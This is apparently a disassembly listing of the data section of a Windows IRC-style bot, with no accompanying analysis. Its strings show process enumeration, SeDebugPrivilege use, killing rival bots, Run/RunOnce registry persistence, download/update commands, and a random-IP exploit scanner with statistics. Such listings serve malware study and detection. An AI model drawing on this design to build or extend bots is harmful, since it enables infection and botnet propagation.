aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_419EA0+78�o
aKernel32_dll_2 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+7D�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_419EA0+8C�o
align 4
aKernel32_dll_3 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+91�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_419EA0+A0�o
align 4
aKernel32_dll_4 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+A5�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_419EA0+B4�o
align 4
aKernel32_dll_5 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+B9�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_419EA0+C8�o
align 4
aKernel32_dll_6 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+CD�o
align 4
aModule32next db 'Module32Next',0 ; DATA XREF: sub_419EA0+DC�o
align 4
aKernel32_dll_7 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+E1�o
align 4
aThread32first db 'Thread32First',0 ; DATA XREF: sub_419EA0+F0�o
align 4
aKernel32_dll_8 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+F5�o
align 4
aThread32next db 'Thread32Next',0 ; DATA XREF: sub_419EA0+104�o
align 4
aKernel32_dll_9 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+109�o
align 4
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_419EA0+118�o
align 4
aKernel32_dl_10 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+11D�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_419EA0+12C�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_419EA0+131�o
align 4
aSS_9 db '%s\%s',0 ; DATA XREF: sub_419EA0+1F5�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+2BE�o
align 4
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+365�o
align 4
aSystem db 'System',0 ; DATA XREF: sub_419EA0+390�o
align 4
aBotKilledS db 'Bot Killed: %s',0 ; DATA XREF: sub_419EA0+451�o
align 4
aSoftwareMicr_2 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419A9F+36�o
align 4
aSoftwareMicr_3 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
; DATA XREF: sub_419A9F+3D�o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
; DATA XREF: sub_419A9F+44�o
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: sub_419A9F+4B�o
align 4
aSystemControls db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
; DATA XREF: sub_419C6D+26�o
align 4
aSS_8 db '%s\%s',0 ; DATA XREF: sub_419C6D+E4�o
align 4
aLdm db 'LDM',0 ; DATA XREF: sub_419C6D+118�o
aNetdde db 'NetDDE',0 ; DATA XREF: sub_419C6D+12B�o
align 4
aEventmessagefi db 'EventMessageFile',0 ; DATA XREF: sub_419C6D+142�o
align 4
aBadAllocati_23 db 'bad allocation',0
align 4
aListTTooLong db 'list<T> too long',0 ; DATA XREF: sub_40121E+2B�o
; sub_4016BA+2B�o
align 10h
dd offset dword_420E80
off_420A74 dd offset nullsub_1 ; DATA XREF: sub_41BB84+23�o
dword_420A78 dd 7325h ; DATA XREF: sub_40177B+EB�o
; sub_4019F3+EB�o ...
dword_420A7C dd 652Dh ; DATA XREF: sub_40177B+1D5�o
dword_420A80 dd 31h ; DATA XREF: sub_40177B+1E7�o
dword_420A84 dd 4C44h ; DATA XREF: sub_40177B+23F�o
; sub_4019F3+1F1�o
aDlAuthFailure_ db 'DL: Auth Failure.',0 ; DATA XREF: sub_40177B:loc_4019C8�o
align 4
aDlInvalidArgum db 'DL: Invalid Arguments',0 ; DATA XREF: sub_40177B:loc_4019D5�o
align 4
aUpdAuthFailure db 'UPD: Auth Failure.',0 ; DATA XREF: sub_4019F3:loc_401BF2�o
align 4
aUpdInvalidArgu db 'UPD: Invalid Arguments.',0 ; DATA XREF: sub_4019F3:loc_401BFF�o
dd offset dword_421030
off_420AE4 dd offset sub_40177B ; DATA XREF: sub_41C370+4A�o
; .data:off_433C58�o
dd offset dword_420FE4
off_420AEC dd offset sub_4019F3 ; DATA XREF: sub_41C370+66�o
; .data:off_433C54�o
aHttpSDS db 'http://%s:%d/%s',0 ; DATA XREF: sub_401C1D+77�o
dd offset dword_42107C
off_420B04 dd offset sub_401C1D ; DATA XREF: sub_41C370+82�o
; .data:off_433C5C�o
aSystemSCpuIXS@ db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
; DATA XREF: sub_401CC0+185�o
db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
db 'm]',0
align 10h
aNetIpSHostNA db 'Net: IP: %s Host: N/A',0 ; DATA XREF: sub_401E82+55�o
align 4
aNetIpSHostS db 'Net: IP: %s Host: %s',0 ; DATA XREF: sub_401E82+73�o
align 10h
dd offset dword_421114
off_420BC4 dd offset sub_401CC0 ; DATA XREF: sub_41C370+9E�o
; .data:off_433C60�o
dd offset dword_4210C8
off_420BCC dd offset sub_401E82 ; DATA XREF: sub_41C370+BA�o
; .data:off_433C64�o
aScanUnknownExp db 'Scan: Unknown Exploit.',0 ; DATA XREF: sub_401F1C:loc_402001�o
align 4
a____0 db '*.*.*.*',0 ; DATA XREF: sub_401F1C+107�o
aA db '-a',0 ; DATA XREF: sub_401F1C+146�o
align 4
aB db '-b',0 ; DATA XREF: sub_401F1C+155�o
align 4
aC db '-c',0 ; DATA XREF: sub_401F1C+164�o
align 4
aScanNotEnoughT db 'Scan: Not Enough Threads. %d Available.',0 ; DATA XREF: sub_401F1C+1AE�o
aD_D_D_D_1 db '%d.%d.%d.%d',0 ; DATA XREF: sub_401F1C+228�o
; sub_401F1C+365�o
aX_ db 'x.',0 ; DATA XREF: sub_401F1C+23F�o
align 4
aD_ db '%d.',0 ; DATA XREF: sub_401F1C+253�o
aSx_ db '%sx.',0 ; DATA XREF: sub_401F1C+26B�o
align 10h
aSD_ db '%s%d.',0 ; DATA XREF: sub_401F1C+266�o
align 4
aSx db '%sx',0 ; DATA XREF: sub_401F1C+2C8�o
aSD db '%s%d',0 ; DATA XREF: sub_401F1C+2DD�o
align 4
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_401F1C+3BE�o
align 10h
aD_D_x_x db '%d.%d.x.x',0 ; DATA XREF: sub_401F1C+3A7�o
align 4
aD_D_D_x db '%d.%d.%d.x',0 ; DATA XREF: sub_401F1C+38D�o
align 4
aScanSDUsingDTh db 'Scan: %s:%d Using %d Threads.',0 ; DATA XREF: sub_401F1C+408�o
align 4
aScanner db 'Scanner',0 ; DATA XREF: sub_401F1C+4E8�o
; sub_40243A+42�o
aScanAllScanThr db 'Scan: All Scan Threads Stopped. %d killed.',0
; DATA XREF: sub_40243A+BF�o
align 4
aStatisticsExpl db 'Statistics: Exploits:',0 ; DATA XREF: sub_40251A+3B�o
align 4
aSSD db '%s %s: %d',0 ; DATA XREF: sub_40251A+62�o
align 10h
aSDaemons db '%s; Daemons:',0 ; DATA XREF: sub_40251A+84�o
align 10h
aSTftpD db '%s TFTP: %d',0 ; DATA XREF: sub_40251A+9A�o
aSHttpD db '%s HTTP: %d',0 ; DATA XREF: sub_40251A+B0�o
dd offset dword_4211F8
off_420D1C dd offset sub_401F1C ; DATA XREF: sub_41C370+E4�o
; .data:off_433C74�o
dd offset dword_4211AC
off_420D24 dd offset sub_40243A ; DATA XREF: sub_41C370+100�o
; .data:off_433C6C�o
dd offset dword_421160
off_420D2C dd offset sub_40251A ; DATA XREF: sub_41C370+11C�o
; .data:off_433C70�o
dbl_420D30 dq 5.0e-1 ; DATA XREF: sub_41A9DE:loc_41AF68�r
flt_420D38 dd 4.2949673e9 ; DATA XREF: sub_41A9DE+584�r
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_423064
dd offset dword_421250
dd 10h
dword_420D88 dd 3 dup(0) ; DATA XREF: .rdata:0041D334�o
dd offset off_423008
dd offset dword_420D9C
dword_420D9C dd 2 dup(0) ; DATA XREF: .rdata:00420D98�o
dd 3, 420DACh, 420DBCh, 420F48h, 420F94h, 0
dd offset off_423008
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420D9Ch
dword_420DD8 dd 3 dup(0) ; DATA XREF: .rdata:0041D368�o
dd offset off_425958
dd offset dword_420FB0
dword_420DEC dd 3 dup(0) ; DATA XREF: .rdata:0041D388�o
dd offset off_423030
dd offset dword_420E00
dword_420E00 dd 2 dup(0) ; DATA XREF: .rdata:00420DFC�o
dd 1, 420E10h, 420E18h, 0
dd offset off_423030
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E00h
dword_420E34 dd 3 dup(0) ; DATA XREF: .rdata:0041DC20�o
dd offset off_423E50
dd offset dword_420E48
dword_420E48 dd 2 dup(0) ; DATA XREF: .rdata:00420E44�o
dd 2, 420E58h, 420E64h, 420F94h, 0
dd offset off_423E50
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420E48h
dword_420E80 dd 3 dup(0) ; DATA XREF: .rdata:00420A70�o
dd offset off_425900
dd offset dword_420E94
dword_420E94 dd 2 dup(0) ; DATA XREF: .rdata:00420E90�o
dd 1, 420EA4h, 420EACh, 0
dd offset off_425900
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E94h
dword_420EC8 dd 3 dup(0) ; DATA XREF: .rdata:0041D328�o
dd offset off_425918
dd offset dword_420EDC
dword_420EDC dd 2 dup(0) ; DATA XREF: .rdata:00420ED8�o
dd 3, 420EECh, 420EFCh, 420F48h, 420F94h, 0
dd offset off_425918
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420EDCh
dword_420F18 dd 3 dup(0) ; DATA XREF: .rdata:0041D31C�o
dd offset off_425938
dd offset dword_420F2C
dword_420F2C dd 2 dup(0) ; DATA XREF: .rdata:00420F28�o
dd 2, 420F3Ch, 420F48h, 420F94h, 0
dd offset off_425938
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F2Ch
dword_420F64 dd 3 dup(0) ; DATA XREF: .rdata:0041D310�o
dd offset off_425974
dd offset dword_420F78
dword_420F78 dd 2 dup(0) ; DATA XREF: .rdata:00420F74�o
dd 2, 420F88h, 420FC8h, 420F94h, 0
dd offset off_425958
align 10h
dd 0FFFFFFFFh, 0
dd 40h, 420FB0h
dword_420FB0 dd 2 dup(0) ; DATA XREF: .rdata:00420DE8�o
dd 1, 420FC0h, 420F94h, 0
dd offset off_425974
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F78h
dword_420FE4 dd 3 dup(0) ; DATA XREF: .rdata:00420AE8�o
dd offset off_425990
dd offset dword_420FF8
dword_420FF8 dd 2 dup(0) ; DATA XREF: .rdata:00420FF4�o
dd 2, 421008h, 421014h, 420EACh, 0
dd offset off_425990
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420FF8h
dword_421030 dd 3 dup(0) ; DATA XREF: .rdata:00420AE0�o
dd offset off_4259A8
dd offset dword_421044
dword_421044 dd 2 dup(0) ; DATA XREF: .rdata:00421040�o
dd 2, 421054h, 421060h, 420EACh, 0
dd offset off_4259A8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421044h
dword_42107C dd 3 dup(0) ; DATA XREF: .rdata:00420B00�o
dd offset off_4259BC
dd offset dword_421090
dword_421090 dd 2 dup(0) ; DATA XREF: .rdata:0042108C�o
dd 2, 4210A0h, 4210ACh, 420EACh, 0
dd offset off_4259BC
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421090h
dword_4210C8 dd 3 dup(0) ; DATA XREF: .rdata:00420BC8�o
dd offset off_4259D8
dd offset dword_4210DC
dword_4210DC dd 2 dup(0) ; DATA XREF: .rdata:004210D8�o
dd 2, 4210ECh, 4210F8h, 420EACh, 0
dd offset off_4259D8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4210DCh
dword_421114 dd 3 dup(0) ; DATA XREF: .rdata:00420BC0�o
dd offset off_4259F4
dd offset dword_421128
dword_421128 dd 2 dup(0) ; DATA XREF: .rdata:00421124�o
dd 2, 421138h, 421144h, 420EACh, 0
dd offset off_4259F4
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421128h
dword_421160 dd 3 dup(0) ; DATA XREF: .rdata:00420D28�o
dd offset off_425A10
dd offset dword_421174
dword_421174 dd 2 dup(0) ; DATA XREF: .rdata:00421170�o
dd 2, 421184h, 421190h, 420EACh, 0
dd offset off_425A10
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421174h
dword_4211AC dd 3 dup(0) ; DATA XREF: .rdata:00420D20�o
dd offset off_425A2C
dd offset dword_4211C0
dword_4211C0 dd 2 dup(0) ; DATA XREF: .rdata:004211BC�o
dd 2, 4211D0h, 4211DCh, 420EACh, 0
dd offset off_425A2C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4211C0h
dword_4211F8 dd 3 dup(0) ; DATA XREF: .rdata:00420D18�o
dd offset off_425A48
dd offset dword_42120C
dword_42120C dd 2 dup(0) ; DATA XREF: .rdata:00421208�o
dd 2, 42121Ch, 421228h, 420EACh, 0
dd offset off_425A48
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 42120Ch, 3 dup(0)
dword_421250 dd 42C4h, 43C9h, 6640h, 8658h, 0EB68h, 1C1D3h, 1C1EEh
; DATA XREF: .rdata:00420D80�o
dd 1C209h, 1C22Ch, 1C24Fh, 1C274h, 1C299h, 1C2BCh, 1C2E1h
dd 1C313h, 1C348h, 0
dword_421294 dd 2 dup(0) ; DATA XREF: sub_40B042+2�o
; sub_40B042+7�o
dword_42129C dd 0 ; DATA XREF: sub_40B066+2�o
; sub_40B066+7�o
dword_4212A0 dd 0 ; DATA XREF: sub_4026B9+29�o
dd offset sub_40264D
dd 0
dd offset dword_4212DC
dd 0FFFFFFFFh, 41C1CBh
dword_4212B8 dd 19930522h, 1, 4212B0h, 5 dup(0) ; DATA XREF: .text:0041C1E4�o
dd 1
dword_4212DC dd 3, 4212ECh, 421940h, 42195Ch, 0 ; DATA XREF: .rdata:004212AC�o
dd offset off_423008
align 8
dd 0FFFFFFFFh, 0
dd 28h, 4026F8h
dword_421308 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_402A45+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402AD7
align 8
dword_421328 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_402DE5+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402E1B
align 8
dword_421348 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403130+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4031EA
align 8
dword_421368 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403207+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40334C
align 8
dword_421388 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4034C4+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403535
align 8
dword_4213A8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403603+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403659
align 8
dword_4213C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403691+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4036D7
align 8
dword_4213E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403CB8+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403D75
align 8
dword_421408 dd 0FFFFFFFEh, 0 ; DATA XREF: .text:00403F3A�o
dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 4040FFh, 404103h, 0FFFFFFFEh, 4040C5h, 4040D9h
dword_421430 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4049A0+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404A38
align 10h
dword_421450 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_404C69+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_404DCA
align 10h
dword_421470 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4050B1+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40511B
align 10h
dword_421490 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405266+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405311
align 10h
dword_4214B0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4053B5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4054BE
dd 0FFFFFFFEh, 0
dd offset sub_4054CA
dword_4214D8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405934+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4059EE
align 8
dword_4214F8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407A0B+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset loc_407AC1
align 8
dword_421518 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407F55+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407FBC
align 8
dword_421538 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4084A1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4085BB
align 8
dword_421558 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4087E0+2�o
dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 408A09h, 408A0Dh, 0
dword_421578 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408AE1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_408BA4
align 8
dword_421598 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408C7E+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_408D4F
dd 2 dup(0)
dd offset sub_408D1B
dword_4215C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A34F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A421
align 10h
dword_4215E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B29C+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B35C
align 10h
dd offset loc_40B31E
dd offset loc_40B328
dword_421608 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B3C2+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B405h, 40B40Eh, 40h, 2 dup(0)
dd offset sub_40B4E5
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 421624h
dword_421658 dd 19930522h, 2, 421634h, 1, 421644h, 3 dup(0) ; DATA XREF: .text:0041C1FF�o
dd 1, 0
dword_421680 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B4FD+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B61D
align 10h
dd offset loc_40B58D
dd offset loc_40B596
dword_4216A8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B699+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40B804h, 40B808h, 0
dword_4216C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B818+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B89Dh, 40B8A1h
dword_4216E4 dd 0 ; DATA XREF: sub_40BA07+162�o
dd offset sub_40B1CF
align 10h
dd offset dword_4216F4
dword_4216F4 dd 2, 421700h, 42195Ch, 0 ; DATA XREF: .rdata:004216F0�o
dd offset off_423E50
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 40BD5Dh, 0
dword_421720 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BE59+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BE79h, 40BE7Dh, 0
dword_421740 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BEA5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BEC9h, 40BECDh, 0
dword_421760 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CB14+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 40CB9Ah, 40CBB1h, 0
dword_421780 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CC52+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40CC98h, 40CCACh, 0
dword_4217A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CD41+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40CE50
align 10h
dword_4217C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D420+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40D4F2
align 10h
dword_4217E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D94F+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DA46
align 10h
dword_421800 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DA6D+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DBAB
align 10h
dword_421820 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DD29+2�o
dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DE97
align 10h
dword_421840 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DFD3+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E069
align 10h
dword_421860 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40E6B0+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E749
align 10h
dword_421880 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EDEE+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40EE80
align 10h
dword_4218A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EEB0+2�o
dd 0FFFFFFC8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F046
dd 2 dup(0)
dd offset sub_40EF7D
dword_4218C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F04F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F126
align 8
dword_4218E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F789+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40F7A6h, 40F7C2h, 0
dword_421908 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4100DA+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 410107h, 410123h, 0
dd offset off_425918
align 10h
dd 0FFFFFFFFh, 0
dd 28h, 4013CEh, 0
dd offset off_425938
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 4013E6h, 0
dd offset off_425958
align 8
dd 0FFFFFFFFh, 0
dword_421970 dd 0Ch, 402C72h, 3, 421924h, 421940h, 42195Ch ; DATA XREF: .rdata:00421994�o
dword_421988 dd 0 ; DATA XREF: sub_40121E+48�o
; sub_4016BA+48�o ...
dd offset sub_4010E1
dd 0
dd offset dword_421970+8
dd 0
dd offset off_425974
dd 0
dd 0FFFFFFFFh, 0
dword_4219AC dd 0Ch, 401637h, 2, 421998h, 42195Ch ; DATA XREF: .rdata:004219CC�o
dword_4219C0 dd 0 ; DATA XREF: sub_4015ED+34�o
; sub_40304B+54�o
dd offset sub_401038
dd 0
dd offset dword_4219AC+8
dword_4219D0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_419760+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 5 dup(0)
dd 0FFFFFFFFh, 41C26Ah
dword_421A00 dd 19930522h, 1, 4219F8h, 5 dup(0) ; DATA XREF: .text:0041C285�o
dd 1, 0FFFFFFFFh, 41C28Fh
dword_421A2C dd 19930522h, 1, 421A24h, 5 dup(0) ; DATA XREF: .text:0041C2AA�o
dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 0
dd 40h, 2 dup(0)
dd offset sub_40150F
dd 40h, 2 dup(0)
dd offset loc_40149D
dd 2 dup(2), 3, 1, 421A70h, 2 dup(0)
dd 3, 1, 421A80h
dword_421AB8 dd 19930522h, 4, 421A50h, 2, 421A90h, 3 dup(0) ; DATA XREF: sub_41C209+11�o
dd 1, 0
dd 0FFFFFFFFh, 41C224h
dword_421AE8 dd 19930522h, 1, 421AE0h, 5 dup(0) ; DATA XREF: .text:0041C23D�o
dd 1, 0
dd 0FFFFFFFFh, 41C247h
dword_421B18 dd 19930522h, 1, 421B10h, 5 dup(0) ; DATA XREF: .text:0041C260�o
dd 1, 0
dd 0FFFFFFFFh, 41C2B4h
dword_421B48 dd 19930522h, 1, 421B40h, 5 dup(0) ; DATA XREF: .text:0041C2CD�o
dd 1, 0
dd 0FFFFFFFFh, 41C2D7h
dword_421B78 dd 19930522h, 1, 421B70h, 5 dup(0) ; DATA XREF: .text:0041C2FC�o
dd 1, 0
dd 0FFFFFFFFh, 41C306h
dword_421BA8 dd 19930522h, 1, 421BA0h, 5 dup(0) ; DATA XREF: .text:0041C331�o
dd 1, 0
dd 0FFFFFFFFh, 41C33Bh
dword_421BD8 dd 19930522h, 1, 421BD0h, 5 dup(0) ; DATA XREF: .text:0041C366�o
dd 1, 21D00h, 2 dup(0)
dd 2222Ch, 1D050h, 21E9Ch, 2 dup(0)
dd 222D2h, 1D1ECh, 21CB0h, 2 dup(0)
dd 2243Ah, 1D000h, 21E94h, 2 dup(0)
dd 22458h, 1D1E4h, 21E7Ch, 2 dup(0)
dd 22464h, 1D1CCh, 21ED4h, 2 dup(0)
dd 22470h, 1D224h, 21EC4h, 2 dup(0)
dd 224B4h, 1D214h, 21E74h, 2 dup(0)
dd 224D6h, 1D1C4h, 5 dup(0)
dd 22418h, 22406h, 223F2h, 223E0h, 223D2h, 223BAh, 223ACh
dd 2239Ah, 2238Ah, 22378h, 22360h, 22350h, 2233Eh, 22326h
dd 22314h, 22304h, 222EEh, 222DEh, 2242Ah, 0
dd 220AEh, 220BCh, 220CEh, 220E8h, 220FAh, 22110h, 2212Ch
dd 2213Ch, 2214Ah, 22158h, 2216Ah, 22176h, 2218Ch, 22198h
dd 221A8h, 221B4h, 2209Ah, 221D2h, 221E4h, 221FAh, 2220Ah
dd 22220h, 22842h, 22832h, 2281Ch, 2280Ch, 227F8h, 227E8h
dd 22088h, 22074h, 22064h, 22050h, 22042h, 22032h, 22022h
dd 22014h, 21FFEh, 21FEAh, 21FDAh, 21FC8h, 21FB8h, 21FA2h
dd 21F8Eh, 21F86h, 21F74h, 21F60h, 21F50h, 21F44h, 221C2h
dd 21F38h, 227D6h, 227C6h, 227AAh, 22798h, 22786h, 22776h
dd 22766h, 2274Ch, 22736h, 2271Ch, 22704h, 226EAh, 226DCh
dd 226CCh, 226BAh, 226ACh, 2269Ch, 2268Eh, 22680h, 22672h
dd 2265Ah, 22642h, 2262Ah, 2261Ah, 22610h, 22602h, 225F6h
dd 225E8h, 225DCh, 225D2h, 224DEh, 224EAh, 22500h, 2251Ch
dd 2253Ah, 22554h, 22566h, 22578h, 2258Ah, 22596h, 225A2h
dd 225BAh, 0
dd 224C0h, 0
dd 8000000Bh, 8000001Fh, 80000018h, 80000029h, 8000004Bh
dd 0
dd 22448h, 0
dd 222C2h, 222A0h, 22294h, 22280h, 2226Eh, 2225Ch, 22248h
dd 222B4h, 2223Ah, 0
dd 22490h, 2247Ch, 224A4h, 0
dd 80000003h, 80000013h, 80000065h, 8000000Dh, 80000001h
dd 80000006h, 80000034h, 80000004h, 80000074h, 80000005h
dd 80000014h, 80000015h, 8000000Fh, 80000012h, 80000011h
dd 8000000Ch, 8000000Bh, 8000000Ah, 80000002h, 80000010h
dd 80000073h, 80000009h, 80000017h, 80000033h, 0
dd 65480210h, 6C417061h, 636F6Ch, 65480216h, 72467061h
dd 6565h, 654701DFh, 63695474h, 756F436Bh, 746Eh, 65470145h
dd 72754374h, 746E6572h, 65726854h, 6461h, 654701A3h, 6F725074h
dd 73736563h, 70616548h, 3560000h, 65656C53h, 35E0070h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 1C10000h
aGetsystemdirec db 'GetSystemDirectoryA',0
dd 65470171h, 73614C74h, 72724574h, 726Fh, 654701A0h, 6F725074h
dd 64644163h, 73736572h, 2520000h, 64616F4Ch, 7262694Ch
dd 41797261h, 17F0000h, 4D746547h, 6C75646Fh, 6E614865h
dd 41656C64h, 1460000h
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
a4 db '4',0
aClosehandle db 'CloseHandle',0
dw 358h
aSuspendthread db 'SuspendThread',0
dw 2D2h
aResumethread db 'ResumeThread',0
align 2
aG db 'ƒ',0
